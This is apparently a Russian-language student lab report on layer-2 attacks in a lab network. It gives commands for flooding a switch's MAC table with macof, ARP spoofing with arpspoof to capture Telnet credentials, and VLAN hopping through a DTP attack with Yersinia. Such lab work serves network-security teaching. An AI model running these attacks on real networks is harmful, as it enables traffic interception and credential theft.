###### tags: `Network` # Отчет по заданиям к практической работе №2. L2. Основные атаки на L2: ### 1) Провести атаки на канальном уровне модели OSI (L2). #### Часть 1. Переполнение таблицы коммутации. | 1. Установим на `Kali linux` необходимую утилиту. | | :----------------------------------------- | |`apt update`| |`apt install dsniff -y`| |![](https://i.imgur.com/dMkU9yI.png)| |![](https://i.imgur.com/JSUEWgr.png)| | 2. Включим атаку и через несколько секунд остановим её с помощью `Ctrl+C`. | | :----------------------------------------- | |`macof`| | ![](https://i.imgur.com/ULC7o7G.png)| | 3. Увидим, что таблица коммутации `Switch7` переполнена. | | :-----------------------------------------| |Таблица коммутации до "флуда"| |![](https://i.imgur.com/5aWPTrk.png)| |Таблица после до "флуда"| |![](https://i.imgur.com/PbJhTFQ.png)| | 5. Сам коммутатор начал испытывать проблемы во время атаки. | | :-----------------------------------------| #### Часть 2. Arp-Spoofing. |1. Установим на `Win7 Telnet`.| | :-----------------------------------------| |![](https://i.imgur.com/kBFjIjF.png)| |2. Проверим, может ли `Win7` подключаться по `Telnet` к `Switch7`.| | :-----------------------------------------| |`telnet 192.168.1.100`| |![](https://i.imgur.com/Nc2tA2g.png)| |![](https://i.imgur.com/Pe0Aclo.png)| |![](https://i.imgur.com/HT6X51u.png)| |3. Настроим `Kali` для атаки. Изменим параметры маршрутизации.| | :-----------------------------------------| |`nano /etc/sysctf.conf`| |![](https://i.imgur.com/skJmknS.png)| |![](https://i.imgur.com/6IUv3Td.png)| |Применим изменения.| |`sysctl -p /etc/sysctl.conf`| |![](https://i.imgur.com/xLZG2j7.png)| |4. Начнём атаку.| | :-----------------------------------------| |`arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100`| |![](https://i.imgur.com/47nrzIp.png)| |5. Обнаруживаем `Telnet`-трафик и аутентификационные данные пользователя.| | :-----------------------------------------| |![](https://i.imgur.com/Haaj03A.png)| |`Follow - TCP Stream`| |![](https://i.imgur.com/aJMATt1.png)| #### Часть 3. VLAN hopping. |1. Поместим `Win10` в `Vlan10`.| | :-----------------------------------------| |`int e1/2`| |`switchport mode access`| |`switchport access vlan 10`| |![](https://i.imgur.com/D1DdtXO.png)| |2. Сконфигурируем `Trunk-port` на `Switch7`.| | :-----------------------------------------| |`int e0/0`| |`switchport trunk encapsulation dot1q`| |`switchport mode trunk`| |![](https://i.imgur.com/UNMUnTu.png)| |3. Настроим на `Switch9` интерфейсы `е0/0`, `e0/1`, `e0/2` в `Trunk`.| | :-----------------------------------------| |![](https://i.imgur.com/OPqP6tr.png)| |4. Настроим на роутере шлюз для `Vlan 10`.| | :-----------------------------------------| |`int e0/1.10`| |`encapsulation dot1q 10`| |`ip address 192.168.10.1 255.255.255.0`| |![](https://i.imgur.com/UuBZs4G.png)| |5. Установим `Yersinia`.| | :-----------------------------------------| |`apt install yersinia -y`| |![](https://i.imgur.com/pKlXtfv.png)| |6. Запустим `Yersinia`.| | :-----------------------------------------| |`yersinia -G`| |![](https://i.imgur.com/BvkNrq4.png)| |7. Проведем атаку на протокол `DTP`.| | :-----------------------------------------| |![](https://i.imgur.com/BldfHrG.png)| |![](https://i.imgur.com/vyJCNjX.png)| |8. Подготовим интерфейсы `Kali`.| | :-----------------------------------------| |`modprobe 8021q`| |`vconfig add eth0 10`| |`ifconfig eth0.10 up`| |![](https://i.imgur.com/UOH4wq2.png)| |![](https://i.imgur.com/fjKtWAD.png)| |![](https://i.imgur.com/12oMjM5.png)| |9. С помощью `Wireshark` проанализируем исходящий трафик от `Kali` и найдем трафик с `Vlan ID=10`.| | :-----------------------------------------| |![](https://i.imgur.com/aYEfkmT.png)|